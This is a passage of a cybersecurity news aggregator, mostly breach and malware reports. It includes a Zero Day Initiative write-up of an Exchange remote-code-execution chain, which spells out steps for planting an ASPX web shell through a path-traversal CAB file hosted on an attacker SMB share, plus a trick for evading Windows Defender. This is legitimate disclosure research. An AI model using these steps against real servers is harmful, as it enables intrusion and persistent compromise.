Nudge Security unveiled new SSPM (SaaS security posture management) capabilities for its SaaS security and governance platform. This enhancement creates the industry’s most comprehensive solution of its kind, combining SaaS discovery, security posture management, spend management, third-party risk, and identity governance in a single, self-service offering that deploys in minutes. As digital identities become prime targets for cyber threats, organizations are prioritizing efforts to strengthen and monitor identity infrastructure. Nudge Security’s SSPM capabilities enable IT and security … More → The post Nudge Security unveils SSPM capabilities to strengthen SaaS security appeared first on Help Net Security.

by Help Net Security

Cybersecurity giant Fortinet, known for its firewalls and network security solutions, has confirmed a cybersecurity incident affecting its systems. The Fortinet data breach confirmation comes following a hacker''s claim of stealing a massive 440 gigabytes of files from the company’s Microsoft SharePoint server. Apart from selling secure networking products, the company also offers SIEM, network management, and EDR/XDR solutions, as well as consulting services. While the exact details of the Fortinet data breach remain unclear, the incident raises concerns about the security of sensitive information entrusted to the company. Analyzing the Fortinet Data Breach On September 12, 2024, a threat actor surfaced on dark web marketplace Breachforums, boasting about accessing a significant amount of data from Fortinet''s Microsoft Azure SharePoint server. The stolen files reportedly included credentials for an S3 storage bucket, potentially containing sensitive user information. The bad actor, operating under the alias ""Fortibitch"", claimed to have also reached out to Fortinet''s founder Ken Xie who allegedly abandoned ransom negotiations. The hacker also questioned why Fortinet had not yet filed an 8-K disclosure at the U.S. Securities and Exchange Commission (SEC), which is a mandatory disclosure for security incidents affecting publicly traded companies. Fortinet Downplays Data Breach Fortinet quickly responded by acknowledging the unauthorized access. In a statement on its website, the company disclosed, ""An individual gained unauthorized access to a limited number of files stored on Fortinet’s instance of a third-party cloud-based shared file drive, which included limited data related to a small number (less than 0.3%) of Fortinet customers."" According to Fortinet, it has more than 755,000 customers, which means approximately 2,265 customers could be impacted. The company denied claims of any malware attack on its systems. “To-date there is no indication that this incident has resulted in malicious activity affecting any customers. Fortinet’s operations, products, and services have not been impacted, and we have identified no evidence of additional access to any other Fortinet resource. The incident did not involve any data encryption, deployment of ransomware, or access to Fortinet’s corporate network,” the statement read. Throwing light on its internal investigation, Fortinet said, ""Given the limited nature of the incident, we have not experienced, and do not currently believe that the incident is reasonably likely to have a material impact to our financial condition or operating results."" The company added that it has already contacted those who were potentially impacted. However, the exact nature of the stolen data and the potential consequences for affected customers remain ambiguous. Fortinet hasn''t explicitly confirmed or denied the hacker''s claim of stealing 440GB of data. Additionally, details regarding the type of information compromised like contact details and financial information are scarce. This lack of transparency leaves many customers feeling uncertain about the extent of the breach and the potential risks involved. This incident highlights the growing threats faced by cybersecurity companies themselves. As companies like Fortinet become the guardians of sensitive data, they become prime targets for hackers seeking valuable information. The Way Forward Following the breach, it''s crucial for Fortinet to prioritize transparency and customer communication. The company should outline the specific data compromised and the steps affected customers can take to mitigate any potential risks. Additionally, a thorough investigation into the breach is necessary to identify vulnerabilities and prevent similar incidents in the future. In the meantime, customers can take proactive measures to protect themselves. It''s advisable to change passwords associated with any accounts potentially linked to Fortinet. Implementing multi-factor authentication (MFA) for added security is also recommended. The Fortinet data breach serves as a stark reminder of the ever-present threat of cyberattacks. By prioritizing transparency, robust security practices, and customer communication, cybersecurity companies can build trust and mitigate the impact of such incidents. *Update September 13, 11:30 AM: Based on the customer count that Fortinet has on its website, included an approximate number of customers impacted in the Fortinet data breach. 

by The Cyber Express

While Mastercard has cybersecurity oversight needs for its cards and payments businesses, it also sells security services to other companies, including banks and fintechs. 

by Cybersecurity Dive

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have highlighted a growing concern about the spread of false claims related to voting. The announcement, titled ""Just So You Know: False Claims of Hacked Voter Information Likely Intended to Sow Distrust of U.S. Elections,"" aims to educate the public on how disinformation tactics are being used to manipulate perceptions and undermine trust in the U.S. electoral process. The announcement comes amid increasing concerns over cybersecurity and the integrity of elections, particularly with the 2024 election cycle approaching. Both the FBI and CISA have observed a troubling trend where foreign actors and cybercriminals propagate misleading information about alleged breaches in U.S. voter registration databases. These claims often exaggerate or fabricate details about voter information hacking to discredit the electoral system and erode public trust. FBI and CISA Stresses Upon Voting Disinformation [caption id=""attachment_89844"" align=""alignnone"" width=""1003""] Announcement of Just So You Know: False Claims of Hacked Voter Information Likely Intended to Sow Distrust of U.S. Elections (Source: CISA)[/caption] CISA Senior Advisor Cait Conley emphasized the importance of skepticism regarding such claims. This PSA is designed to inform the public that reports of compromised election infrastructure, such as a hacked voter registration database, should be scrutinized. These allegations are frequently used by foreign entities to influence public opinion and disrupt confidence in our democratic institutions,"" Conley stated. The FBI, through its Cyber Division, has been actively investigating attempts by malicious actors to interfere with U.S. elections. Deputy Assistant Director Cynthia Kaiser explained, ""Our investigations have shown that these actors often attempt to undermine public trust by exaggerating claims about obtaining U.S. voter information. We urge the public to critically assess any reports of hacked voter information and understand that much of the voter registration data is publicly accessible. The issue of voter information hacking has become a significant point of concern, especially as misinformation campaigns progresses. The FBI and CISA work collaboratively with federal, state, local, and territorial election officials to safeguard the voting process and enhance the resilience of U.S. elections. Their efforts include providing support, sharing critical information, and debunking false claims related to voting hacking. Disinformation and Personal Agendas The rise of disinformation regarding voter information hacking has prompted both agencies to increase their outreach and educational efforts. They stress that while voter registration information is indeed public, the integrity and security of the election process remain intact. The goal is to prevent misinformation from gaining traction and to ensure that the American public maintains a robust confidence in the democratic system. As the 2024 elections draw nearer, the vigilance of both the FBI and CISA underscores their commitment to protecting electoral integrity. By informing the public about the tactics used by disinformation agents and encouraging a critical approach to sensational claims, they aim to fortify the trust in the U.S. election process. The joint public service announcement (PSA) from the FBI and CISA is an important reminder for the public to critically assess any claims of election-related hacking. This PSA highlights the necessity of skepticism towards unverified allegations, especially those alleging breaches of voter information. Both agencies emphasize their ongoing commitment to addressing and debunking false narratives about voting hacking. Their work is focused on safeguarding the security and integrity of U.S. elections. For the public, it is crucial to stay well-informed and discerning about the sources of information related to election security. As misinformation can easily spread, relying on verified and authoritative sources is essential for understanding the true state of U.S. elections. The FBI and CISA''s efforts are aimed at ensuring that the electoral process remains transparent and secure, reinforcing public confidence and countering disinformation campaigns effectively. Role of the FBI and CISA in Elections The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) play critical roles in ensuring the security and integrity of U.S. elections. Their coordinated efforts involve working closely with federal, state, local, and territorial election officials to provide essential services and information aimed at enhancing the security of election processes and maintaining the resilience of the electoral system. To support their mission, both the FBI and CISA encourage the public to report any suspicious or criminal activities, such as ransomware attacks, to the FBI Internet Crime Complaint Center (IC3) at www.ic3.gov. Cyber incidents can also be reported directly to CISA by calling 1-844-Say-CISA (1-844-729-2472), emailing report@dhs.cisa.gov, or reporting online at cisa.gov/report. For additional assistance and resources, individuals can visit CISA’s Stop Ransomware page for guidance on tackling ransomware, explore the CISA #Protect2024 initiative for protection against various election-related risks, and utilize Protected Voices for resources on defending against online foreign influence operations, cyber threats, and federal election crimes. These resources are designed to help individuals and organizations stay informed and prepared against potential threats to election security.

by The Cyber Express

In the latest episode of Security Pill, The Cyber Express explored a significant shakeup in the cybersecurity industry sparked by Mastercard''s acquisition of Recorded Future, one of the pioneers in threat intelligence. The discussion, featuring Beenu Arora, CEO and Co-Founder of Cyble, examined the potential impact of this acquisition on businesses and industries across various sectors. As cybersecurity became more integrated with business strategies, Arora highlighted the importance of threat intelligence and how these changes may affect security priorities. He also discussed the broader implications of acquisitions like this, offering insights into navigating the evolving cybersecurity landscape. Watch the Video Here: https://youtu.be/Fm8cmLy-s8A?si=6qFuMRL8Q098UGRq Mastercard''s Acquisition Mastercard''s acquisition of Recorded Future stands out as a landmark deal in the cybersecurity industry, with many experts, including Arora, labeling it as historic. ""This is one of the largest cybersecurity deals we have seen recently,"" said Arora. Recorded Future, known for providing real-time threat intelligence, analytics, and insights on cyber threats, has been a leader in its field for over 15 years. Arora elaborated on the implications of this acquisition, stating, ""I can only imagine the possibilities, ranging from real-time threat detection for Mastercard’s ecosystem of merchants and partners to potentially improving fraud detection capabilities."" He highlighted that the deal strengthens Mastercard''s position in the cybersecurity space while expanding its reach beyond payment processing. The Role of Threat Intelligence Traditionally, threat intelligence has been viewed as a highly technical component of cybersecurity operations. However, with Mastercard''s acquisition of Recorded Future, threat intelligence is moving from a niche technology to a central part of a company’s security and business strategy. Arora emphasized that threat intelligence should no longer be considered a ""siloed technical capability"" but a crucial element of broader business strategy. ""Threat intelligence sits at the heart of designing business strategies,"" said Arora, pointing out that the acquisition reinforces the notion that threat intelligence can be a powerful tool for businesses looking to grow securely. This shift in perspective, from viewing threat intelligence as a purely technical function to integrating it into strategic decision-making, is a trend that many businesses are beginning to recognize. Paul, a co-host of the Security Pill podcast, noted that threat intelligence has become ""a central component of a security plan,"" marking a significant shift in how businesses approach cybersecurity. He suggested that Mastercard''s acquisition of Recorded Future would serve to drive this point home, further embedding threat intelligence into day-to-day operations. Navigating the Cybersecurity World As organizations increasingly prioritize cybersecurity in their business strategies, the question arises: Will acquisitions like Mastercard’s shift focus away from industries outside of its core business? Paul raised this concern during the discussion, asking whether industries such as healthcare and energy should worry about losing attention from Recorded Future, now that it is part of Mastercard’s ecosystem. Arora acknowledged that such concerns are valid but suggested that they are typical of any acquisition. ""With any acquisition, the acquirer generally has their own DNA and focus,"" he said, explaining that Mastercard’s focus on the banking and payments sector may influence how Recorded Future operates. However, Arora pointed out that this also offers Recorded Future significant leverage by gaining access to Mastercard''s extensive network of merchants and partners. While there is potential for some industries to feel neglected, Arora believes that the cybersecurity ecosystem is robust enough to fill any gaps. ""If in case some vacuum gets created, there are other players who would step up to fill that vacuum,"" he said, mentioning Cyble’s role as one of the largest competitors to Recorded Future in mature markets. Cyble works with over 500 organizations globally, spanning both private and government sectors, positioning itself as a key player in the threat intelligence market. The Future of Threat Intelligence Looking ahead, Arora is optimistic about the growth and evolution of threat intelligence as an industry. ""There’s no doubt that this industry is going to expand further,"" he said, noting that threat intelligence is becoming increasingly important in business strategy discussions. He emphasized that threat intelligence is now a key factor in safeguarding intellectual property, preventing cyberattacks, and mitigating risks. Moreover, as cyberattacks grow more sophisticated, threat intelligence plays a critical role in protecting businesses from both external and internal threats. State-sponsored actors, organized criminals, and financially motivated attackers are constantly seeking sensitive information, making threat intelligence indispensable for businesses looking to defend against such threats. Arora concluded by reinforcing his belief in the power of threat intelligence to drive business growth while maintaining security. ""Threat Intel can be a really powerful aspect when you are intending to grow your business securely,"" he said, aligning with Cyble’s mission of ""creating a better world for everyone."" Conclusion The acquisition of Recorded Future by Mastercard marks a pivotal moment in the cybersecurity industry, further cementing the role of threat intelligence in business strategies. While there are concerns about how this acquisition may affect industries outside of Mastercard''s core focus, Beenu Arora remains confident that the cybersecurity ecosystem is resilient enough to adapt. As businesses continue to prioritize cybersecurity, the integration of threat intelligence into strategic decision-making will only become more critical in safeguarding against evolving threats. This episode of Security Pill highlights the importance of staying informed about industry trends and exploring potential alternatives to ensure that organizations across all sectors can navigate the changing cybersecurity landscape.

by The Cyber Express

by ComputerWeekly

Mr. Michael Clark, deputy director of plans and policy at U.S. Cyber Command, presented a plan to integrate artificial intelligence into military cyber operations at the C3.ai conference, Sept. 10, 2024. The AI roadmap aims to improve analytic capabilities, scale operations, and enhance adversary disruption.

by U.S. Cyber Command News

Episode 363 has brain rot, stolen mobiles in China and streaming fraud!

by Kaspersky

This blog summarizes the Ailurophile Stealer Technical & Malware Analysis Report. It explains in detail the technical analysis of Ailurophile Stealer and how one can secure oneself against security vulnerabilities. What is Ailurophile Stealer? Ailurophile Stealer is an advanced information-stealing malware that first appeared on ThreatMon on August 15, 2024. The malware is hosted on publicly accessible […] The post Ailurophile Stealer: A Threatening Information Stealer Malware appeared first on ThreatMon Blog.

by ThreatMon

Infrastructure as Code (IaC) has become a widely adopted practice in modern DevOps, automating the management and provisioning of technology infrastructure through machine-readable definition files. What can we to do make IaC secure by default? Security workflows for IaC First, let’s consider that the security workflows for IaC usually comprise multiple steps and practices. IaC code is stored in version control systems, such as Git, with changes tracked and reviewed before merging, which helps improve … More → The post How to make Infrastructure as Code secure by default appeared first on Help Net Security.

by Help Net Security

by ComputerWeekly

Organizations must reassess their email security posture as incidents continue to escalate, leading to financial losses. Key findings reveal a significant increase in email attacks, with many successfully bypassing standard security protocols and targeting vulnerable sectors. Business email compromise, phishing, and sophisticated social engineering tactics continue to evolve, exploiting gaps in security measures. Email attacks skyrocket 293% Acronis | Acronis H1 2024 Cyberthreats Report | August 2024 Email attacks have surged by 293% in the … More → The post Security measures fail to keep up with rising email attacks appeared first on Help Net Security.

by Help Net Security

Organizations are grappling with their current NHI (non-human identities) security strategies, according to Cloud Security Alliance and Astrix Security. The high volume of NHIs significantly amplifies the security challenges organizations face. Each NHI can potentially access sensitive data and critical systems, increasing the attack surface exponentially. Without adequate visibility and control over these NHIs, the risk of security incidents rises. Organizations’ lack of confidence suggests their current NHI security methods are lagging behind their human … More → The post Organizations still don’t know how to handle non-human identities appeared first on Help Net Security.

by Help Net Security

Cyber insurance is poised for exponential growth over the coming decade, but it remains a capital-intensive peril that requires structural innovation, according to CyberCube. The mid-range projection suggests that the US standalone cyber insurance market could reach $45 billion in premiums by 2034, a fivefold increase from today. Cyber insurance is projected to snowball However, product innovation will be required to achieve real growth in exposures rather than mainly rate increases, as seen in recent … More → The post Cyber insurance set for explosive growth appeared first on Help Net Security.

by Help Net Security

Singapore, Singapore, 13th September 2024, CyberNewsWire

by Hackread

Here’s a look at the most interesting products from the past week, featuring releases from Druva, Huntress, Ketch, LOKKER, Tenable, Trellix, and Wing Security. Tenable AI Aware provides exposure insight into AI applications, libraries and plugins Tenable AI Aware leverages agents, passive network monitoring, dynamic application security testing and distributed scan engines to detect approved and unapproved AI software, libraries and browser plugins, along with associated vulnerabilities, thereby mitigating risks of exploitation, data leakage and … More → The post New infosec products of the week: September 13, 2024 appeared first on Help Net Security.

by Help Net Security

A technique to abuse Microsoft''s built-in source code editor has finally made it into the wild, thanks to China''s Mustang Panda APT.

by Dark Reading

This research focuses on the importance of native audit logs in secure-by-design software, emphasizing the need for kernel-level ETW logging over user-mode hooks to enhance anti-tamper protections.

by Elastic Security Lab

This vulnerability allows remote attackers to execute arbitrary code on affected installations of mySCADA myPRO. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2024-4708.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to bypass authentication on affected installations of SolarWinds Access Rights Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-28990.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of SolarWinds Access Rights Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 9.9. The following CVEs are assigned: CVE-2024-28991.

by Zero Day Initiative Advisories

Bank customers in the Central Asia region have been targeted by a new strain of Android malware codenamed Ajina.Banker since at least November 2023 with the goal of harvesting financial information and intercepting two-factor authentication (2FA) messages. Singapore-headquartered Group-IB, which discovered the threat in May 2024, said the malware is propagated via a network of Telegram channels

by The Hacker News

GitLab on Wednesday released security updates to address 17 security vulnerabilities, including a critical flaw that allows an attacker to run pipeline jobs as an arbitrary user. The issue, tracked as CVE-2024-6678, carries a CVSS score of 9.9 out of a maximum of 10.0 ""An issue was discovered in GitLab CE/EE affecting all versions starting from 8.14 prior to 17.1.7, starting from 17.2 prior to

by The Hacker News

A hacker claims to have stolen 440 GB of data from cybersecurity firm Fortinet, exploiting an Azure SharePoint…

by Hackread

Their findings highlight the frailty of some of the mechanisms for establishing trust on the Internet.

by Dark Reading

An attacker is using the tool to deploy a cryptominer and the Tsunami DDoS bot on compromised systems.

by Dark Reading

Fortinet disclosed a data breach after a threat actor claimed the theft of 440GB of files from the company’s Microsoft Sharepoint server. Today, Fortinet told Cyber Daily that a threat actor gained unauthorized access to a third-party service it used. “An individual gained unauthorized access to a limited number of files stored on Fortinet’s instance […]

by Security Affairs

In most cases, a breach involves hackers stealing data they can then resell on the dark web. Now, it is becoming increasingly common for these same hackers to inflict physical damage with their attacks.

by Barracuda

The dangerous ransomware group is targeting financial and insurance sectors using smishing and vishing against IT service desk administrators, cybersecurity teams, and other employees with top-level privileges.

by Dark Reading

Law enforcement seized electronics containing special hacking tools and software as well as a substantial amount of cash in the raids.

by Dark Reading

Malwarebytes has uncovered a malicious campaign targeting Mac and iPhone users seeking AppleCare+ support. Scammers have been using Google ads to redirect unsuspecting victims to fake AppleCare+ support pages hosted on GitHub, tricking them into calling fraudulent support lines. From there, call center agents posing as Apple representatives extract money and personal information from the … The post Phony AppleCare+ Pages Hosted on GitHub Promoted via Google Ads appeared first on CyberInsider.

by Cyber Insider

Most investors aren''t demanding cybersecurity preparedness from startups, but founders should still be worried about the risks.

by Dark Reading

Nearly 1.3 million Android-based TV boxes running outdated versions of the operating system and belonging to users spanning 197 countries have been infected by a new malware dubbed Vo1d (aka Void). ""It is a backdoor that puts its components in the system storage area and, when commanded by attackers, is capable of secretly downloading and installing third-party software,"" Russian antivirus

by The Hacker News

Transport for London (TfL) has disclosed a significant cyber security incident that exposed customer data, including 5,000 Oyster card users. The breach, discovered on September 1, 2024, revealed suspicious activity on TfL''s systems, prompting an investigation involving the National Crime Agency (NCA) and the National Cyber Security Centre (NCSC). The NCA announced today that it … The post Transport for London Investigates Data Breach in Oyster Cards appeared first on CyberInsider.

by Cyber Insider

Doctor Web has identified a widespread infection targeting Android TV boxes through a malware strain dubbed Android.Vo1d. This backdoor trojan has affected nearly 1.3 million devices in 197 countries, compromising system files and enabling attackers to remotely install software on users'' devices. The issue came to light in August 2024 when several users reached out … The post 1.3 Million Android TV Boxes Infected by New ‘Vo1d’ Malware appeared first on CyberInsider.

by Cyber Insider

by Dark Reading

by Dark Reading

Internet-exposed Selenium Grid instances are being targeted by bad actors for illicit cryptocurrency mining and proxyjacking campaigns. ""Selenium Grid is a server that facilitates running test cases in parallel across different browsers and versions,"" Cado Security researchers Tara Gould and Nate Bill said in an analysis published today. ""However, Selenium Grid''s default configuration lacks

by The Hacker News

by Dark Reading

AttackIQ has released a new attack graph that seeks to emulate the Tactics, Techniques and Procedures (TTPs) associated with Ebury Linux malware. Despite previous arrests and actions against key perpetrators, Ebury continues to evolve, and its operations remain active. The post Emulating the Persistent and Stealthy Ebury Linux Malware appeared first on AttackIQ.

by AttackIQ

A June report from CyberSeek found that there are only enough skilled workers to fill 85 percent of cybersecurity jobs in America.

by Cisco Talos Blog

Keeping track of the many variants of Atomic Stealer can be a challenge for SOC teams. Our guide breaks down the latest versions. The post From Amos to Poseidon | A SOC Team’s Guide to Detecting macOS Atomic Stealers 2024 appeared first on SentinelOne.

by SentinelOne

Threat actors have infected over 1.3 million TV streaming boxes running Android with a new Vo1d backdoor malware, allowing the attackers to take full control of the devices. [...]

by BleepingComputer

In the wake of a gathering of industry leaders at Microsoft to discuss the endpoint-security ecosystem, some thoughts

by Sophos News

Cato CTRL (Cyber Threats Research Lab) has released its Q2 2024 Cato CTRL SASE Threat Report. The report highlights critical findings based on the analysis of a staggering 1.38 trillion network flows from more than 2,500 of Cato’s global customers, between April and June 2024. Key Insights from the Q2 2024 Cato CTRL SASE Threat Report The report is packed with unique insights that are based on

by The Hacker News

Iraqi government networks have emerged as the target of an ""elaborate"" cyber attack campaign orchestrated by an Iran state-sponsored threat actor called OilRig. The attacks singled out Iraqi organizations such as the Prime Minister''s Office and the Ministry of Foreign Affairs, cybersecurity company Check Point said in a new analysis. OilRig, also called APT34, Crambus, Cobalt Gypsy, GreenBug,

by The Hacker News

The Irish Data Protection Commission (DPC) has announced that it has commenced a ""Cross-Border statutory inquiry"" into Google''s foundational artificial intelligence (AI) model to determine whether the tech giant has adhered to data protection regulations in the region when processing the personal data of European users. ""The statutory inquiry concerns the question of whether Google has complied

by The Hacker News

Safety Check is getting an upgrade, and now you''ll be able to better manage website notifications and permissions.

by ZDNET Security

Beware before calling Apple for assistance as scammers are creating malicious ads and fake pages to lure you in.

by Malwarebytes Labs

A recent National Crime Agency (NCA) investigation led to the arrest of a teenager in Walsall, England, linked…

by Hackread

Meta has admitted to scraping Australian Facebook user''s public photos, posts and other data to train its AI models, including those of kids on adult profiles.

by Malwarebytes Labs

As you may know, I recently presented my Exchange-related talk during OffensiveCon 2024. This series of 4 blog posts is meant to supplement the talk and provide additional technical details. You can read the first post in this series here. In part 2, I describe the ApprovedApplicationCollection gadget, which was available for abuse because it did not appear on the deny list and could therefore be accessed via MultiValuedProperty. I am also presenting a path traversal in the Windows utility extrac32.exe, which allowed me to complete the chain for a full RCE in Exchange. For the moment, at least, Microsoft has made a decision not to fix this path traversal bug. You can watch the full talk here: “Half Measures and Full Compromise: Exploiting Microsoft Exchange PowerShell Remoting”. This blog post covers the part from 18:10 to 21:10. Introduction In the previous post, I described two RCE vulnerabilities, CVE-2023-21529 and CVE-2023-32031. In this post, I present the next RCE that found in Microsoft Exchange. It consists of a chain of two vulnerabilities: • CVE-2023-36756 – a vulnerability in Exchange Server.• ZDI-CAN-21499 – an unpatched path traversal vulnerability in the Windows utility extrac32.exe. Microsoft decided that ZDI-CAN-21499 would not be fixed as “Windows customers are not exposed to this vulnerability.” They also note that, in their view, “It is the caller''s (the application using extrac32) responsibility to make sure extrac32 is not called on untrusted CAB files.” As we will see in this article, though, the extrac32 issue can be used to an attacker’s advantage. The Patch for CVE-2023-32031 While Microsoft was dealing with the ProxyNotShell chain back in 2022, I took some time to look for different classes that could be abused to exploit PowerShell Remoting for some security impact, such as RCE, file disclosure, denial of service, or NTLM relaying. I found around 30 unique classes and reported them to Microsoft. Those submissions were marked as duplicates and were ignored, which in my opinion was a mistake. The initial patch for the ProxyNotShell included an allow list, so it seems that the deficiencies in the separate deny list did not attract the attention it should. The problem became evident later when I discovered the vulnerable MultiValuedProperty class (CVE-2023-21529). This class was present on the allow list, and it allowed me to access a separate, internal deserialization mechanism not subject to the allow list sanitation. Even after the internal MultiValuedProperty deserialization mechanism was hardened by means of the deny list, I was able to easily abuse the classes that I had reported many months before, as they had not been added to the deny list. For example, I was able to use the Command class, as I described in the previous post. I had originally reported this class to Microsoft in September 2022, but I was able to reuse this class for CVE-2023-32031 almost seven months later because it did not appear on the deny list introduced in the patch for MultiValuedProperty. To patch CVE-2023-32031, Microsoft expanded the deny list to include all the classes that I had previously in 2022. The patch went no further than that. Critically, it still did not introduce an allow list, so it was game on. All I had to do was find another class with security impact not included in the deny list, and then I could use MultiValuedProperty to deserialize it. This became my next challenge CVE-2023-36756 – ApprovedApplicationCollection I was looking for classes where something potentially malicious could be reached either through a single-argument constructor or a static Parse(String) method. This approach led me to the Microsoft.Exchange.Data.Directory.SystemConfiguration.ApprovedApplicationCollection class. As you can see, we can deliver an object of any type to the constructor. The code flow can go in multiple directions from here. We are interested in a case where a string is provided to the constructor. When a string is provided, the code expects it to be a valid path to a file with a .cab extension. The code does not validate the path in any meaningful way except for checking the extension. The code leads to the ParseCab method, where the argument contains the attacker-supplied path: At [1], a FileInfo object is created from the attacker’s path. At [2] and [3], a temporary output directory is created. At [4], the OpenCabinetFile method is called. At [5], the entire temporary directory is deleted. At this stage, we can confirm two things. We can deliver a UNC path, such as \\192.168.1.100\poc\poc.cab. The Exchange PowerShell Remoting requires Kerberos authentication, so the attacker most likely resides in the internal network anyway. It is rather rare to see the SMB traffic filtered internally. Thus, in most cases it will not present a challenge for the attacker to host content that the Exchange server can access over SMB. Next, our remote path is processed by OpenCabinetFile. Let’s analyze this method. It seems that our cabinet file is going to be extracted with the following command: extrac32.exe /Y /E /L “C:\Windows\Temp\random-uuid\” “\\192.168.1.100\poc\poc.cab” Basically, the content of our remote CAB file will be extracted to some temporary directory. Then, the entire directory will be deleted. There does not seem to be any available unsafe operations here. As we will see, though, it turns out that extrac32 has its own issues. ZDI-CAN-21499 – Unpatched Path Traversal in extrac32 In general, we can use the ApprovedApplicationCollection internal Exchange class to extract our CAB file with the Windows utility extrac32.exe. This could lead to a file parsing bug, where the parsing part is performed by some unmanaged code. We could always try to look for memory corruptions in extrac32.exe. Before even thinking about it, I decided to go for a full-dumb option, which can be summarized with the following meme. I simply created a CAB containing a single file, where the filename contains the path traversal sequence ..\, and tested it. It turned out that the extrac32 extraction mechanism is vulnerable to a trivial path traversal. There is still one problem, though. The file presented in the screenshot gets detected as malicious by Windows Defender: Luckily for the attackers, antivirus signatures are not always very smart, and this one can be easily bypassed. For example: ..\poc.txt - the CAB file gets tagged as malicious by Windows Defender. ../poc.txt - the CAB file is seen as legitimate by Windows Defender. I reported the path traversal vulnerability to Microsoft in June of 2023. After a short discussion, we received the following final response from the vendor: “To clarify our earlier point – it is the caller''s (application using extrac32) responsibility to make sure extrac32 is not called on untrusted CAB files.” To me, this does not seem sensible. It seems like the equivalent of asking people to manually verify the contents of a ZIP file before you unzip it with one of the available solutions. However, this was Microsoft’s final reply. The upshot was that since Microsoft clearly stated that it is going to be Exchange’s fault for the way it uses extrac32, I could use this to get a CVE in Exchange. Chaining the Pieces The attacker needs to do the following to exploit this vulnerability: -- Create a malicious CAB file that contains an ASPX web shell, with the file name set to something like ../../../../../../../../inetpub/wwwroot/poc.aspx.-- Host this CAB file on an SMB share in the domain.-- Perform PowerShell Remoting deserialization, where:       -- The target type is MultiValuedProperty<ApprovedApplicationCollection>.       -- The argument is a UNC path pointing to our CAB file, such as: \\192.168.1.100\poc\poc.cab.-- Access the webshell and get code execution. Fragment of the payload: After this, you can enjoy your web shell. As always, I have prepared a demo that presents the entire exploitation process. SummaryIn this blog post, I have presented the CVE-2023-36756 vulnerability in Microsoft Exchange Server. It allowed any authenticated attacker to achieve remote code execution by uploading a web shell. In my next blog post, part 3 of the Exchange PowerShell Remoting series, I am going to present my CVE-2023-36745 RCE vulnerability. To make it work, I had to prepare one of the craziest chains that I have ever made, so I am excited to share it with you. Once again, you can watch my entire OffensiveCon 2024 talk here. Until my next post, you can follow me @chudypb and follow the team on Twitter, Mastodon, LinkedIn, Bluesky, or Instagram for the latest in exploit techniques and security patches.

by Zero Day Initiative Blog

A 17-year-old male was arrested in Walsall following a major cyberattack on Transport for London (TfL), the agency responsible for the city’s transit systems. The National Crime Agency (NCA) announced today that the teenager was detained under suspicion of breaching the Computer Misuse Act, directly tied to a cyberattack launched on September 1. The NCA, collaborating closely with the National Cyber Security Centre (NCSC) and TfL, has taken the lead on the investigation. While the exact details of the attack remain undisclosed, officials remain focused on managing the risks and securing public infrastructure. ""Attacks on public infrastructure such as this can be hugely disruptive and lead to severe consequences for local communities and national systems,"" said Paul Foster, the NCA’s National Cyber Crime Unit Deputy Director. The unnamed teenager was questioned by NCA officers and later released on bail. ""We have been working at pace to support Transport for London following a cyberattack on their network, and to identify the criminal actors responsible,"" Foster noted. Data at Risk as Transport for London Incident Unfolds Cyberattacks targeting public infrastructure aren''t just digital pranks—they threaten the core of urban life. TfL confirmed, at the time, that their internal systems came under attack but reassured the public that no disruptions to transportation services took place. However, the agency has taken swift actions to contain the threat and prevent further damage. Shashi Verma, TfL’s chief technology officer, at the time emphasized that their systems and customer data remain secure. ""We have implemented a series of measures to safeguard our internal systems and prevent further unauthorized access,"" Verma told the BBC. However, TfL in a Thursday update revealed that the situation is evolving and its investigations  identified certain customer data been accessed. ""This includes some customer names and contact details, including email addresses and home addresses where provided,"" the announcement said. Preliminary investigations also found that some Oyster card refund data may have been accessed. An Oyster card is a smart card in which money can be virtually added so that commuters can pay on the go. ""This could include bank account numbers and sort codes for a limited number of customers (around 5,000),"" TfL said. TfL is working alongside the NCA and NCSC to secure its digital infrastructure and avoid any larger-scale fallout. Cybercrime, particularly attacks targeting public infrastructure, poses a growing challenge for law enforcement and cybersecurity professionals. No Stranger to Cybersecurity Threats While the current attack did not have a materialistic impact, it’s not TfL’s first encounter with a cyber-related breach. In July 2023, a third-party vendor’s MOVEit managed file transfer system compromised approximately 13,000 customer contact details. Despite this, banking information remained safe. Interconnected systems can expose organizations to vulnerabilities, even if the primary attack vector isn''t aimed directly at them. Attacks exploiting third-party software showcase a common but often underestimated risk in digital security—supply chain vulnerabilities. Young Hackers a Troubling Sign The arrest of a teenage suspect in connection to the TfL cyberattack illustrates a larger pattern of increasingly younger individuals getting involved in cybercrime. One noteworthy case involves Arion Kurtaj, an 18-year-old hacker who successfully breached Rockstar Games and Uber. Another popular case is that of Vastaamo Hacker, Julius Kivimäki. He was arrested in 2013 at the age of 15, but received a juvenile non-custodial two-year suspended sentence. The lenient punishment likely failed to dissuade him, as Kivimäki was swiftly implicated in several other hacks carried out with adolescent cohorts before vanishing for years and resurfacing in 2020 with the Vastaamo hack. The reasons behind teens turning to such malevolent behavior are many: from curiosity to money. But law enforcement agencies have observed this trend growing exponentially in recent years, as hacking tools become more accessible. The tools available to cybercriminals have evolved beyond the stereotypical lone hacker in a dark room. The rise of ransomware-as-a-service (RaaS) platforms and the development of more sophisticated malware have enabled even low-level attackers to create chaos. For public infrastructure like TfL, the stakes couldn''t be higher. Urban centers rely on interconnected transportation, power, and communication networks that, if disrupted, could paralyze entire cities, and the recent TfL incident is a wake-up call. Ransomware’s Growing Threat to Public Infrastructure While the NCA has not confirmed whether the September 1 attack involved ransomware, recent history suggests that public infrastructure remains a high-value target for such attacks. Cybercriminal groups have increasingly targeted critical services, knowing the immense pressure these systems face to remain operational. A well-timed ransomware attack could lock down key services, causing widespread disruptions and leading to significant ransom demands. Globally, we’ve seen ransomware attacks impact everything from hospitals to power grids. In 2021, the Colonial Pipeline attack in the United States shut down a major fuel supply line, leading to widespread panic and fuel shortages along the East Coast. If an attack of similar scale targeted TfL, it could potentially shut down the entire transport system, leading to chaos in one of the world’s busiest cities. Lessons Learned: Strengthening Cyber Defenses For organizations like TfL, the importance of cybersecurity cannot be overstated. The rapid response by both TfL 